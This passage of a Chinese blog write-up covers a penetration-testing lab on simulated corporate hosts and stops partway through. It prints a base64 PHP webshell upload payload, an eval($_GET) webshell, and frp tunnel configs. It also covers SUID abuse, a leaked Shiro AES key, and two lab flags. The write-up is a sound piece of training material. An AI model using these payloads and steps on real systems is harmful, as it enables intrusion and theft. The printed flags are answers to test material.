<!DOCTYPE html>
<html lang="zh-cn" dir="ltr">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content="第一届长城杯半决赛渗透题赛后复现">
<title>春秋云境-GreatWall综合渗透</title>

<link rel='canonical' href='https://flowers-boy.github.io/p/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-greatwall%E7%BB%BC%E5%90%88%E6%B8%97%E9%80%8F/'>

<link rel="stylesheet" href="/scss/style.min.663803bebe609202d5b39d848f2d7c2dc8b598a2d879efa079fa88893d29c49c.css"><meta property='og:title' content="春秋云境-GreatWall综合渗透">
<meta property='og:description' content="第一届长城杯半决赛渗透题赛后复现">
<meta property='og:url' content='https://flowers-boy.github.io/p/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-greatwall%E7%BB%BC%E5%90%88%E6%B8%97%E9%80%8F/'>
<meta property='og:site_name' content='关根'>
<meta property='og:type' content='article'><meta property='article:section' content='Post' /><meta property='article:tag' content='渗透' /><meta property='article:published_time' content='2024-12-19T20:50:49&#43;08:00'/><meta property='article:modified_time' content='2024-12-19T20:50:49&#43;08:00'/><meta property='og:image' content='https://flowers-boy.github.io/p/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-greatwall%E7%BB%BC%E5%90%88%E6%B8%97%E9%80%8F/GreatWall.png' />
<meta name="twitter:title" content="春秋云境-GreatWall综合渗透">
<meta name="twitter:description" content="第一届长城杯半决赛渗透题赛后复现"><meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:image" content='https://flowers-boy.github.io/p/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-greatwall%E7%BB%BC%E5%90%88%E6%B8%97%E9%80%8F/GreatWall.png' />
    </head>
    <body class="
    article-page
    ">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.documentElement.dataset.scheme = 'dark';
        } else {
            document.documentElement.dataset.scheme = 'light';
        }
    })();
</script>
<div class="container main-container flex on-phone--column extended"><aside class="sidebar left-sidebar sticky ">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="切换菜单">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header>
        
            
            <figure class="site-avatar">
                <a href="/">
                
                    
                    
                    
                        
                        <img src="/img/avatar_hu13873874631994540591.png" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                
                </a>
                
                    <span class="emoji">🍥</span>
                
            </figure>
            
        
        
        <div class="site-meta">
            <h1 class="site-name"><a href="/">关根</a></h1>
            <h2 class="site-description">种一棵树最好的时间是十年前，其次是现在</h2>
        </div>
    </header><ol class="menu-social">
            
                <li>
                    <a 
                        href='https://space.bilibili.com/1771939823'
                        target="_blank"
                        title="bilibili"
                        rel="me"
                    >
                        
                        
                            <svg  xmlns="http://www.w3.org/2000/svg"  width="24"  height="24"  viewBox="0 0 24 24"  fill="none"  stroke="currentColor"  stroke-width="2"  stroke-linecap="round"  stroke-linejoin="round"  class="icon icon-tabler icons-tabler-outline icon-tabler-brand-bilibili"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M3 10a4 4 0 0 1 4 -4h10a4 4 0 0 1 4 4v6a4 4 0 0 1 -4 4h-10a4 4 0 0 1 -4 -4v-6z" /><path d="M8 3l2 3" /><path d="M16 3l-2 3" /><path d="M9 13v-2" /><path d="M15 11v2" /></svg>
                        
                    </a>
                </li>
            
                <li>
                    <a 
                        href='https://github.com/CaiJimmy/hugo-theme-stack'
                        target="_blank"
                        title="GitHub"
                        rel="me"
                    >
                        
                        
                            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-brand-github" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M9 19c-4.3 1.4 -4.3 -2.5 -6 -3m12 5v-3.5c0 -1 .1 -1.4 -.5 -2c2.8 -.3 5.5 -1.4 5.5 -6a4.6 4.6 0 0 0 -1.3 -3.2a4.2 4.2 0 0 0 -.1 -3.2s-1.1 -.3 -3.5 1.3a12.3 12.3 0 0 0 -6.2 0c-2.4 -1.6 -3.5 -1.3 -3.5 -1.3a4.2 4.2 0 0 0 -.1 3.2a4.6 4.6 0 0 0 -1.3 3.2c0 4.6 2.7 5.7 5.5 6c-.6 .6 -.6 1.2 -.5 2v3.5" />
</svg>



                        
                    </a>
                </li>
            
        </ol><ol class="menu" id="main-menu">
        
        
        
        <li >
            <a href='/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>主页</span>
            </a>
        </li>
        
        
        <li >
            <a href='/%E5%85%B3%E4%BA%8E/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>关于</span>
            </a>
        </li>
        
        
        <li >
            <a href='/archives/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-archive" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <rect x="3" y="4" width="18" height="4" rx="2" />
  <path d="M5 8v10a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-10" />
  <line x1="10" y1="12" x2="14" y2="12" />
</svg>



                
                <span>归档</span>
            </a>
        </li>
        
        
        <li >
            <a href='/search/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-search" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="10" cy="10" r="7" />
  <line x1="21" y1="21" x2="15" y2="15" />
</svg>



                
                <span>搜索</span>
            </a>
        </li>
        
        
        <li >
            <a href='/%E5%8F%8B%E9%93%BE/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-link" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M10 14a3.5 3.5 0 0 0 5 0l4 -4a3.5 3.5 0 0 0 -5 -5l-.5 .5" />
  <path d="M14 10a3.5 3.5 0 0 0 -5 0l-4 4a3.5 3.5 0 0 0 5 5l.5 -.5" />
</svg>



                
                <span>友链</span>
            </a>
        </li>
        
        <li class="menu-bottom-section">
            <ol class="menu">

                
                    <li id="dark-mode-toggle">
                        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                        <span>暗色模式</span>
                    </li>
                
            </ol>
        </li>
    </ol>
</aside>

    <aside class="sidebar right-sidebar sticky">
        
            
                
    <section class="widget archives">
        <div class="widget-icon">
            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-hash" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <line x1="5" y1="9" x2="19" y2="9" />
  <line x1="5" y1="15" x2="19" y2="15" />
  <line x1="11" y1="4" x2="7" y2="20" />
  <line x1="17" y1="4" x2="13" y2="20" />
</svg>



        </div>
        <h2 class="widget-title section-title">目录</h2>
        
        <div class="widget--toc">
            <nav id="TableOfContents">
  <ol>
    <li><a href="#前置知识">前置知识</a></li>
    <li><a href="#拓扑图">拓扑图</a></li>
    <li><a href="#813071173-公网入口">8.130.71.173-公网入口</a>
      <ol>
        <li><a href="#内网一层代理">内网一层代理</a></li>
      </ol>
    </li>
    <li><a href="#172282326-新翔0a">172.28.23.26-新翔0A</a></li>
    <li><a href="#172282333-erp后台">172.28.23.33-ERP后台</a>
      <ol>
        <li><a href="#17228233359696">172.28.23.33:59696</a></li>
      </ol>
    </li>
    <li><a href="#1722214024">172.22.14.0/24</a>
      <ol>
        <li><a href="#内网二层代理">内网二层代理</a></li>
        <li><a href="#172221437-k8s-api未授权">172.22.14.37-k8s API未授权</a></li>
        <li><a href="#172221446-harbor">172.22.14.46-harbor</a></li>
        <li><a href="#172221028-mysql-udf提权">172.22.10.28-mysql-udf提权</a></li>
      </ol>
    </li>
  </ol>
</nav>
        </div>
    </section>

            
        
    </aside>


            <main class="main full-width">
    <article class="has-image main-article">
    <header class="article-header">
        <div class="article-image">
            <a href="/p/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-greatwall%E7%BB%BC%E5%90%88%E6%B8%97%E9%80%8F/">
                <img src="/p/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-greatwall%E7%BB%BC%E5%90%88%E6%B8%97%E9%80%8F/GreatWall_hu10136302213747657627.png"
                        srcset="/p/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-greatwall%E7%BB%BC%E5%90%88%E6%B8%97%E9%80%8F/GreatWall_hu10136302213747657627.png 800w, /p/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-greatwall%E7%BB%BC%E5%90%88%E6%B8%97%E9%80%8F/GreatWall_hu2944875340720035024.png 1600w"
                        width="800" 
                        height="376" 
                        loading="lazy"
                        alt="Featured image of post 春秋云境-GreatWall综合渗透" />
                
            </a>
        </div>
    

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/writeup/" >
                Writeup
            </a>
        
    </header>
    

    <div class="article-title-wrapper">
        <h2 class="article-title">
            <a href="/p/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-greatwall%E7%BB%BC%E5%90%88%E6%B8%97%E9%80%8F/">春秋云境-GreatWall综合渗透</a>
        </h2>
    
        
        <h3 class="article-subtitle">
            第一届长城杯半决赛渗透题赛后复现
        </h3>
        
    </div>

    
    
    
    
    <footer class="article-time">
        
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-calendar-time" width="56" height="56" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M11.795 21h-6.795a2 2 0 0 1 -2 -2v-12a2 2 0 0 1 2 -2h12a2 2 0 0 1 2 2v4" />
  <circle cx="18" cy="18" r="4" />
  <path d="M15 3v4" />
  <path d="M7 3v4" />
  <path d="M3 11h16" />
  <path d="M18 16.496v1.504l1 1" />
</svg>
                <time class="article-time--published">2024-12-19</time>
            </div>
        

        
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



                <time class="article-time--reading">
                    阅读时长: 4 分钟
                </time>
            </div>
        
    </footer>
    

    
</div>

</header>

    <section class="article-content">
    
    
    <blockquote>
<p>在这个靶场中，您将扮演一名渗透测试工程师，接受雇佣任务来评估“SmartLink Technologies Ltd.”公司的网络安全状况。 您的任务是首先入侵该公司暴露在公网上的应用服务，然后运用后渗透技巧深入 SmartLink公司的内部网络。在这个过程中，您将寻找潜在的弱点和漏洞，并逐一接管所有服务，从而控制整个内部网络。靶场中共设置了6个Flag，它们分布在不同的靶机上，您需要找到并获取这些 Flag 作为您的成就目标。</p>
</blockquote>
<meta name="referrer" content="no-referrer" />
<h2 id="前置知识">前置知识
</h2><p>建议把以下知识点吃透再去打靶机，建立综合渗透思维</p>
<blockquote>
<p>thinkphp5023</p>
<p>Heapdump内存分析、Shiro 反序列化</p>
<p>代码审计</p>
<p>frp代理、二层代理、proxifire全局流量代理</p>
<p>蚁剑绕过disable_functions</p>
<p>Kubernetes API server 未授权</p>
<p>Harbor 公开镜像仓库未授权访问 CVE-2022-46463（<em>1.x &lt;= Harbor &lt;= 2.5.3</em>）</p>
<p>MySQL UDF 提权</p>
</blockquote>
<h2 id="拓扑图">拓扑图
</h2><p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220142925251-1840536605.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220142928189"
	
	
></p>
<h2 id="813071173-公网入口">8.130.71.173-公网入口
</h2><p>使用fscan进行扫描</p>
<blockquote>
<p>8.130.71.173:22 open</p>
<p>8.130.71.173:8080 open</p>
<p>8.130.71.173:80 open</p>
<p>WebTitle http://8.130.71.173       code:200 len:10887  title:&quot;&quot;</p>
<p>WebTitle http://8.130.71.173:8080  code:200 len:1027   title:Login Form</p>
<p>PocScan http://8.130.71.173:8080 poc-yaml-thinkphp5023-method-rce poc1</p>
</blockquote>
<p>发现<code>8080</code>端口存在<code>thinkphp5023-method-rce</code>漏洞，工具getshell一把梭</p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220091922723-75050722.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220091924497"
	
	
></p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241227140155299-964448020.png"
	
	
	
	loading="lazy"
	
		alt="image-20241227140144307"
	
	
></p>
<blockquote>
<p>ifconfig</p>
<p>公网：8.130.71.173</p>
<p>内网：172.28.23.17</p>
</blockquote>
<p>根目录拿到第一个flag</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">flag01: flag{176f49b6-147f-4557-99ec-ba0a351e1ada}
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220092444523-740949944.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220092446934"
	
	
></p>
<p>传fscan扫内网<code>172.28.23.0/24</code>网段</p>
<blockquote>
<p>提取关键信息</p>
<p>[+] ftp 172.28.23.26:21:anonymous</p>
<p>[-&gt;]OASystem.zip</p>
<p>[+] PocScan <a class="link" href="http://172.28.23.33:8080/"  target="_blank" rel="noopener"
    >http://172.28.23.33:8080</a> poc-yaml-spring-actuator-heapdump-file</p>
<p>[+] PocScan <a class="link" href="http://172.28.23.33:8080/"  target="_blank" rel="noopener"
    >http://172.28.23.33:8080</a> poc-yaml-springboot-env-unauth spring2</p>
</blockquote>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220092954395-71218051.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220092956592"
	
	
></p>
<h3 id="内网一层代理">内网一层代理
</h3><p><strong>frp设置代理</strong></p>
<blockquote>
<p>公网vps</p>
<p>frps</p>
<p>[common]</p>
<p>bind_port = 7000</p>
</blockquote>
<blockquote>
<p>webshell/8.130.71.173</p>
<p>frpc</p>
<p>[common]</p>
<p>server_addr = 公网服务器地址</p>
<p>server_port = 7000</p>
<p>[socks5]</p>
<p>type = tcp</p>
<p>remote_port = 6000</p>
<p>plugin = socks5</p>
</blockquote>
<p><strong>proxifier全局流量代理</strong></p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220144208492-266597381.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220144140611"
	
	
></p>
<p>具体可见文章：<a class="link" href="https://mp.weixin.qq.com/s/Cq-DdH1DseOJIcEGwb0RWg"  target="_blank" rel="noopener"
    >关于内网代理、vm、frp、proxifier全局流量转发等问题</a></p>
<h2 id="172282326-新翔0a">172.28.23.26-新翔0A
</h2><p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241227140833292-2022108997.png"
	
	
	
	loading="lazy"
	
		alt="image-20241227140811168"
	
	
></p>
<blockquote>
<p>[+] ftp 172.28.23.26:21:anonymous</p>
<p>[-&gt;]OASystem.zip</p>
</blockquote>
<p>ftp匿名登录，到本地</p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220101100448-297199615.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220101102198"
	
	
></p>
<p>进行代码审计，很明显的文件上传</p>
<p>引入db.php和<code>checklogin.php</code>文件</p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220102037184-1435572680.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220102038998"
	
	
></p>
<p><code>check.php</code>，设置cookie：<code>id=1;loginname=1;jueseid=1;danweiid=1;quanxian=1</code>，就能登录main.php，下面的upload可以不用登录进行上传，导致这个代码审计结果用处不大</p>
<p><code>check.php</code></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="o">&lt;?</span><span class="nx">php</span>
</span></span><span class="line"><span class="cl"><span class="k">function</span> <span class="nf">islogin</span><span class="p">(){</span>
</span></span><span class="line"><span class="cl">   <span class="k">if</span><span class="p">(</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">&#39;id&#39;</span><span class="p">])</span><span class="o">&amp;&amp;</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">&#39;loginname&#39;</span><span class="p">])</span><span class="o">&amp;&amp;</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">&#39;jueseid&#39;</span><span class="p">])</span><span class="o">&amp;&amp;</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">&#39;danweiid&#39;</span><span class="p">])</span><span class="o">&amp;&amp;</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">&#39;quanxian&#39;</span><span class="p">])){</span>
</span></span><span class="line"><span class="cl">	   <span class="k">if</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">&#39;id&#39;</span><span class="p">]</span><span class="o">!=</span><span class="s1">&#39;&#39;</span><span class="o">&amp;&amp;</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">&#39;loginname&#39;</span><span class="p">]</span><span class="o">!=</span><span class="s1">&#39;&#39;</span><span class="o">&amp;&amp;</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">&#39;jueseid&#39;</span><span class="p">]</span><span class="o">!=</span><span class="s1">&#39;&#39;</span><span class="o">&amp;&amp;</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">&#39;danweiid&#39;</span><span class="p">]</span><span class="o">!=</span><span class="s1">&#39;&#39;</span><span class="o">&amp;&amp;</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">&#39;quanxian&#39;</span><span class="p">]</span><span class="o">!=</span><span class="s1">&#39;&#39;</span><span class="p">){</span>
</span></span><span class="line"><span class="cl">	       <span class="k">return</span> <span class="k">true</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	   <span class="p">}</span>
</span></span><span class="line"><span class="cl">	    <span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	      <span class="k">return</span> <span class="k">false</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	   <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	    <span class="k">return</span> <span class="k">false</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">     <span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="cp">?&gt;</span><span class="err">
</span></span></span></code></pre></td></tr></table>
</div>
</div><p><code>uploadbase64.php</code></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="o">&lt;?</span><span class="nx">php</span>
</span></span><span class="line"><span class="cl"><span class="sd">/**
</span></span></span><span class="line"><span class="cl"><span class="sd"> * Description: PhpStorm.
</span></span></span><span class="line"><span class="cl"><span class="sd"> * Author: yoby
</span></span></span><span class="line"><span class="cl"><span class="sd"> * DateTime: 2018/12/4 18:01
</span></span></span><span class="line"><span class="cl"><span class="sd"> * Email:logove@qq.com
</span></span></span><span class="line"><span class="cl"><span class="sd"> * Copyright Yoby版权所有
</span></span></span><span class="line"><span class="cl"><span class="sd"> */</span>
</span></span><span class="line"><span class="cl"><span class="nv">$img</span> <span class="o">=</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">&#39;imgbase64&#39;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="p">(</span><span class="nx">preg_match</span><span class="p">(</span><span class="s1">&#39;/^(data:\s*image\/(\w+);base64,)/&#39;</span><span class="p">,</span> <span class="nv">$img</span><span class="p">,</span> <span class="nv">$result</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$type</span> <span class="o">=</span> <span class="s2">&#34;.&#34;</span><span class="o">.</span><span class="nv">$result</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$path</span> <span class="o">=</span> <span class="s2">&#34;upload/&#34;</span> <span class="o">.</span> <span class="nx">date</span><span class="p">(</span><span class="s2">&#34;Y-m-d&#34;</span><span class="p">)</span> <span class="o">.</span> <span class="s2">&#34;-&#34;</span> <span class="o">.</span> <span class="nx">uniqid</span><span class="p">()</span> <span class="o">.</span> <span class="nv">$type</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="nv">$img</span> <span class="o">=</span>  <span class="nx">base64_decode</span><span class="p">(</span><span class="nx">str_replace</span><span class="p">(</span><span class="nv">$result</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="nv">$img</span><span class="p">));</span>
</span></span><span class="line"><span class="cl"><span class="o">@</span><span class="nx">file_put_contents</span><span class="p">(</span><span class="nv">$path</span><span class="p">,</span> <span class="nv">$img</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="k">exit</span><span class="p">(</span><span class="s1">&#39;{&#34;src&#34;:&#34;&#39;</span><span class="o">.</span><span class="nv">$path</span><span class="o">.</span><span class="s1">&#39;&#34;}&#39;</span><span class="p">);</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>格式为<code>data:image;base64,xxx</code>，就能够上传(<strong>post</strong>)</p>
<p><code>imgbase64=data:image/php;base64,PD89YCRfR0VUWzFdYDtldmFsKCRfUE9TVFsxXSk7Pz4=</code></p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220104404024-1144068946.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220104406456"
	
	
></p>
<p>上webshell，回显<code>ret=127</code>，使用蚁剑的<code>disable_functions</code>插件绕过</p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220104528252-133349552.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220104530082"
	
	
></p>
<p>自动新建<code>/var/www/html/OAsystem/upload/.antproxy.php</code>和<code>/tmp/.90482ant_x64.so</code>文件</p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220104804332-656229640.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220104806828"
	
	
></p>
<p>上传<code>1.php</code>的get型马，让<code>.antproxy.php</code>指向<code>1.php</code>，使能get利用</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="o">&lt;?</span><span class="nx">php</span> <span class="k">eval</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span><span class="cp">?&gt;</span><span class="err">
</span></span></span></code></pre></td></tr></table>
</div>
</div><p><code>.antproxy.php</code>的37行修改为<code>1.php</code>的路径</p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220105543293-1555205362.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220105545629"
	
	
></p>
<blockquote>
<p>ifconfig</p>
<p>172.28.23.26</p>
<p>172.22.14.6</p>
</blockquote>
<p>get方式传，看到<code>flag02.txt</code>，不能直接cat读取</p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220105834679-537666458.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220105837262"
	
	
></p>
<p><code>find / -perm -u=s -type f 2&gt;/dev/null</code>，看suid权限</p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220110310723-2010613173.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220110313027"
	
	
></p>
<p>可以利用<code>base32</code>，解码flag-&gt;</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">flag02: flag{56d37734-5f73-447f-b1a5-a83f45549b28}
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220110435049-214566635.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220110437542"
	
	
></p>
<h2 id="172282333-erp后台">172.28.23.33-ERP后台
</h2><p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241227141339293-238308030.png"
	
	
	
	loading="lazy"
	
		alt="image-20241227141336756"
	
	
></p>
<blockquote>
<p>[+] PocScan <a class="link" href="http://172.28.23.33:8080/"  target="_blank" rel="noopener"
    >http://172.28.23.33:8080</a> poc-yaml-spring-actuator-heapdump-file</p>
</blockquote>
<p>访问<code>/actuator/heapdump</code>路径得到<code>heapdump</code>文件</p>
<p><code>java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump</code>解密，找到key的值</p>
<blockquote>
<p>algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES</p>
</blockquote>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220094845745-362951579.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220094848046"
	
	
></p>
<p>aes加密，内定key，猜测是shiro框架，工具一把梭</p>
<p>在<code>/home/ops01/</code>目录发现<code>HashNote</code>文件，以及在基础信息搜集阶段发现59696监听端口，pwn题目</p>
